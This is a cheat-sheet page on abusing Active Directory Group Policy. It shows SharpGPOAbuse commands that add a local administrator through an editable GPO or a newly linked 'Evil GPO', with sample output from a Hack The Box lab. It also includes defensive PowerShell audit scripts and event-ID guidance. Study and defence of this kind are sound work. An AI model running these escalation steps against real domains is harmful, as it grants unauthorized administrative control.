General
1. Install GPMC [Optional]
# Run as Administrator
Install-WindowsFeature GPMC
Sample Output:
PS C:\Windows\system32> Install-WindowsFeature GPMC
Install-WindowsFeature GPMC
Success Restart Needed Exit Code Feature Result
------- -------------- --------- --------------
True No Success {Group Policy Management}
2. List GPO names
# List all GPOs
Get-GPO -All | Select-Object DisplayName
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
# Check GPO by name
Get-GPO -Name '<GPO_NAME>'
Sample Output:
TO-DO
# Generate XML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType XML
Sample Output:
TO-DO
# Generate pretty HTML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType HTML -Path "C:\ProgramData\GPOReport.html"
Sample Output:
TO-DO
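The commands above list and report on GPOs; the question a defender asks next is who is allowed to edit them, because every abuse that follows starts from an account holding edit rights on a GPO (the sample output further down shows the user in a "GPO Managers" group). The following script is an added example, not part of the original page or of any tool it references. It assumes the GroupPolicy module installed with GPMC, a domain-joined host, and a baseline list of expected editors that you adjust to your environment.

```powershell
# Added example: report every principal that can edit a GPO and flag those outside a baseline.
# Assumes the GroupPolicy module (installed with GPMC) on a domain-joined host.
Import-Module GroupPolicy

# Principals normally expected to hold edit rights on GPOs (assumption; tune per domain).
$Baseline   = @('Domain Admins', 'Enterprise Admins', 'SYSTEM', 'ENTERPRISE DOMAIN CONTROLLERS')
$EditLevels = @('GpoEdit', 'GpoEditDeleteModifySecurity')

function Get-GpoEditDelegation {
    param([string[]]$ExpectedEditors = $Baseline)

    foreach ($gpo in Get-GPO -All) {
        # -All returns one permission entry per trustee on the GPO
        foreach ($p in (Get-GPPermission -Guid $gpo.Id -All)) {
            $level = [string]$p.Permission
            if ($EditLevels -notcontains $level) { continue }

            $name = $p.Trustee.Name
            [pscustomobject]@{
                GPO        = $gpo.DisplayName
                Trustee    = $name
                TrusteeSid = [string]$p.Trustee.Sid
                Permission = $level
                Owner      = $gpo.Owner
                Modified   = $gpo.ModificationTime
                Unexpected = ($ExpectedEditors -notcontains $name)
            }
        }
    }
}

# Show only delegations outside the baseline, most recently modified GPO first.
Get-GpoEditDelegation |
    Where-Object Unexpected |
    Sort-Object Modified -Descending |
    Format-Table GPO, Trustee, Permission, Owner, Modified -AutoSize
```

Run it as a domain user with read access to the GPO objects. Any row it prints is a principal that can do everything in the two abuse sections below; either the delegation is intentional and documented, or it is the finding.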
Abuse #1: Add local admin
1. Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName '<GPO_NAME>'
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount 'HHogan' --GPOName 'Default Domain Policy'
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
2. Force reload
gpupdate /force
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\HHogan\Documents> net user HHogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.
Ref: SharpGPOAbuse
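The output above shows what the tool touches: the GPO's GptTmpl.inf in SYSVOL (a security template in INI format), whose [Group Membership] section carries Restricted Groups entries, and the GPO version number so clients apply the change. The script below is an added example for the defensive side, not code from the original page or from SharpGPOAbuse. It reads that section from every GPO in the domain and reports each group/member pair with SIDs resolved, so a newly added member of BUILTIN\Administrators (S-1-5-32-544) stands out. It assumes the GroupPolicy and ActiveDirectory modules and read access to SYSVOL; the "Suspicious" rule (any Restricted Groups entry targeting Administrators) is an assumption to tune.

```powershell
# Added example: enumerate Restricted Groups entries in every GPO's GptTmpl.inf.
# Assumes the GroupPolicy and ActiveDirectory modules and read access to \\<domain>\SYSVOL.
Import-Module GroupPolicy
Import-Module ActiveDirectory

function Resolve-SidName {
    param([string]$Sid)
    try {
        (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch {
        $Sid   # an unresolvable SID stays raw, which is worth a look on its own
    }
}

function Get-RestrictedGroupEntries {
    param([string]$Domain = (Get-ADDomain).DNSRoot)

    foreach ($gpo in Get-GPO -All -Domain $Domain) {
        $inf = "\\$Domain\SYSVOL\$Domain\Policies\{$($gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
        if (-not (Test-Path -Path $inf)) { continue }

        # GptTmpl.inf carries a BOM, so Get-Content picks the right encoding by itself.
        $inSection = $false
        foreach ($line in Get-Content -Path $inf) {
            if ($line -match '^\s*\[(.+)\]\s*$') {
                $inSection = ($Matches[1] -eq 'Group Membership')
                continue
            }
            if (-not $inSection) { continue }
            # Entry form: *<group SID or name>__Members = *<SID>,*<SID>   (or __Memberof)
            if ($line -notmatch '^\s*\*?(?<group>.+?)__(?<kind>Members|Memberof)\s*=\s*(?<val>.*)$') { continue }

            $group = $Matches.group
            $kind  = $Matches.kind
            $vals  = $Matches.val -split ',' | ForEach-Object { $_.Trim().TrimStart('*') } | Where-Object { $_ }

            foreach ($v in $vals) {
                [pscustomobject]@{
                    GPO         = $gpo.DisplayName
                    Group       = Resolve-SidName $group
                    Kind        = $kind
                    Member      = Resolve-SidName $v
                    MemberSid   = $v
                    GpoModified = $gpo.ModificationTime
                    Suspicious  = ($group -eq 'S-1-5-32-544' -and $kind -eq 'Members')
                }
            }
        }
    }
}

Get-RestrictedGroupEntries |
    Sort-Object Suspicious, GpoModified -Descending |
    Format-Table GPO, Group, Kind, Member, GpoModified, Suspicious -AutoSize
```

Pair the scan with change detection: a SACL on the Policies share (object-access auditing, Event ID 4663) records which account wrote GptTmpl.inf, and the GPO's ModificationTime in the output tells you which one changed after the last review.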
Abuse #2: WriteGPLink
1. Create a New GPO
New-GPO -Name "Evil GPO"
Sample Output:
TO-DO
2. Link to Target
Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=<TARGET>,DC=<DOMAIN>,DC=<COM>"
Sample Output:
TO-DO
3. Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName 'Evil GPO'
Sample Output:
TO-DO
4. Force reload
gpupdate /force
Sample Output:
TO-DO
5. Check membership
net user '<USER>'
Sample Output:
TO-DO
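This variant does not need edit rights on an existing GPO: a freshly created GPO is linked to an OU by a principal that can write the OU's gPLink attribute. The defensive counterpart is to know every link in the domain, who owns and when someone created the linked GPO, and who can write gPLink on each container. The script below is an added example, not part of the original page. It assumes the ActiveDirectory and GroupPolicy modules (the AD: drive they provide), a 14-day "new GPO" window and a trusted-owner list, both of which are assumptions to tune; the gPLink schema GUID f30e3bbe-9ff0-11d1-b603-0000f80367c1 is the real attribute GUID.

```powershell
# Added example: report every GPO link with the linked GPO's owner and age, and list the
# principals that can write gPLink on the target container.
# Assumes the ActiveDirectory and GroupPolicy modules on a domain-joined host.
Import-Module ActiveDirectory
Import-Module GroupPolicy

# Schema GUID of the gPLink attribute; an ACE granting WriteProperty on it is WriteGPLink.
$gPLinkGuid = [guid]'f30e3bbe-9ff0-11d1-b603-0000f80367c1'

function Get-GpoLinkReport {
    param(
        [int]$NewerThanDays = 14,                                      # assumption: tune
        [string[]]$TrustedOwners = @('Domain Admins', 'Enterprise Admins')  # assumption: tune
    )
    $domain  = Get-ADDomain
    $cutoff  = (Get-Date).AddDays(-$NewerThanDays)
    $targets = @($domain.DistinguishedName) +
               @(Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName)

    foreach ($dn in $targets) {
        # Principals with an Allow ACE that covers gPLink (explicitly, or via an all-properties right)
        $acl = Get-Acl -Path "AD:\$dn"
        $linkWriters = $acl.Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $_.ActiveDirectoryRights -match 'WriteProperty|GenericWrite|GenericAll|WriteDacl|WriteOwner' -and
                ($_.ObjectType -eq [guid]::Empty -or $_.ObjectType -eq $gPLinkGuid)
            } |
            ForEach-Object { $_.IdentityReference.Value } |
            Sort-Object -Unique

        foreach ($link in (Get-GPInheritance -Target $dn).GpoLinks) {
            $gpo       = Get-GPO -Guid $link.GpoId
            $ownerName = ($gpo.Owner -split '\\')[-1]
            [pscustomobject]@{
                Target      = $dn
                GPO         = $gpo.DisplayName
                Enabled     = $link.Enabled
                Enforced    = $link.Enforced
                Owner       = $gpo.Owner
                Created     = $gpo.CreationTime
                Suspicious  = ($gpo.CreationTime -gt $cutoff) -or ($TrustedOwners -notcontains $ownerName)
                LinkWriters = ($linkWriters -join '; ')
            }
        }
    }
}

Get-GpoLinkReport |
    Sort-Object Suspicious, Created -Descending |
    Format-Table Target, GPO, Owner, Created, Suspicious, LinkWriters -AutoSize
```

A link to a GPO created days ago by an account outside the trusted-owner list is the pattern this section produces; the LinkWriters column is the delegation to remove so it cannot recur. With "Audit Directory Service Changes" enabled and a SACL on the OU, the link operation itself is logged as Event ID 5136 with gPLink as the modified attribute.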